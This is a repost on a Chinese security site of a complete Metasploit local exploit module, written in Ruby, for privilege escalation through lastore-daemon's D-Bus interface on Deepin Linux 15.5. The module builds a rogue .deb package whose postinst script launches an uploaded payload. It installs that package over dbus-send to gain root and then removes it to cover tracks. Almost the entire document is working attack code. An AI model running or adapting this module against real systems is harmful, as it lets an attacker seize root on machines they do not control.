首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
lastore-daemon D-Bus Privilege Escalation
来源:metasploit.com 作者:Coles 发布时间:2018-04-23  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'lastore-daemon D-Bus Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on Deepin Linux systems
        by using lastore-daemon to install a package.

        The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
        user in the sudo group to install arbitrary system packages without
        providing a password, resulting in code execution as root. By default,
        the first user created on the system is a member of the sudo group.

        This module has been tested successfully with lastore-daemon version
        0.9.53-1 on Deepin Linux 15.5 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          "King's Way",   # Discovery and exploit
          'Brendan Coles' # Metasploit
        ],
      'DisclosureDate' => 'Feb 2 2016',
      'References'     =>
        [
          [ 'EDB', '39433' ],
          [ 'URL', 'https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8' ],
        ],
      'Platform'       => 'linux',
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'DefaultTarget'  => 0))
    register_options([
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ])
  end

  def base_dir
    datastore['WritableDir']
  end

  def mkdir(path)
    vprint_status "Creating '#{path}' directory"
    cmd_exec "mkdir -p #{path}"
    register_dir_for_cleanup path
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def command_exists?(cmd)
    cmd_exec("command -v #{cmd} && echo true").include? 'true'
  end

  def dbus_priv?
    res = install_package '', ''
    (res.include? 'DBus.Error.AccessDenied') ? false : true
  end

  def install_package(name, path)
    dbus_send dest: 'com.deepin.lastore',
              type: 'method_call',
              path: '/com/deepin/lastore',
              interface: 'com.deepin.lastore.Manager.InstallPackage',
              contents: "string:'#{name}' string:'#{path}'"
  end

  def remove_package(name)
    dbus_send dest: 'com.deepin.lastore',
              type: 'method_call',
              path: '/com/deepin/lastore',
              interface: 'com.deepin.lastore.Manager.RemovePackage',
              contents: "string:' ' string:'#{name}'"
  end

  def dbus_send(dest:, type:, path:, interface:, contents:)
    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
  end

  def check
    %w(lastore-daemon dpkg-deb dbus-send).each do |cmd|
      unless command_exists? cmd
        vprint_error "#{cmd} is not installed. Exploitation will fail."
        return CheckCode::Safe
      end
      vprint_good "#{cmd} is installed"
    end

    unless dbus_priv?
      vprint_error 'User is not permitted to install packages. Exploitation will fail.'
      return CheckCode::Safe
    end
    vprint_good 'User is permitted to install packages'

    CheckCode::Appears
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    print_status 'Building package...'

    payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
    payload_path = "#{base_dir}/#{payload_name}"
    pkg_name = rand_text_alphanumeric rand(10..15)
    pkg_path = "#{base_dir}/.#{pkg_name}"

    mkdir "#{pkg_path}/DEBIAN"
    pkg = "Package: #{pkg_name}\n"
    pkg << "Version: 0.1\n"
    pkg << "Maintainer: #{pkg_name}\n"
    pkg << "Architecture: all\n"
    pkg << "Description: #{pkg_name}\n"
    upload "#{pkg_path}/DEBIAN/control", pkg
    upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &"

    cmd_exec "dpkg-deb --build '#{pkg_path}'"

    unless file_exist? "#{pkg_path}.deb"
      fail_with Failure::Unknown, 'Building package failed'
    end

    print_status 'Uploading payload...'
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Installing package...'
    res = install_package pkg_name, "#{pkg_path}.deb"
    vprint_line res

    unless res.include? 'object path'
      fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log'
    end

    Rex.sleep 15

    print_status 'Removing package...'
    res = remove_package pkg_name.downcase
    vprint_line res

    unless res.include? 'object path'
      print_warning 'Package removal failed. Check /var/log/lastore/daemon.log'
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ASUS infosvr Authentication By
·Kaspersky KSN Remote Code Exec
·Chrome V8 JIT NodeProperties::
·Apache CouchDB 1.7.0 and 2.x b
·Microsoft Internet Explorer 11
·PRTG Network Monitor < 18.1.39
·VX Search 10.6.18 - 'directory
·Interspire Email Marketer < 6.
·Lutron Quantum 2.0 - 3.2.243 -
·VLC Media Player/Kodi/PopcornT
·Easy File Sharing Web Server 7
·Ericsson-LG iPECS NMS A.1Ac -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved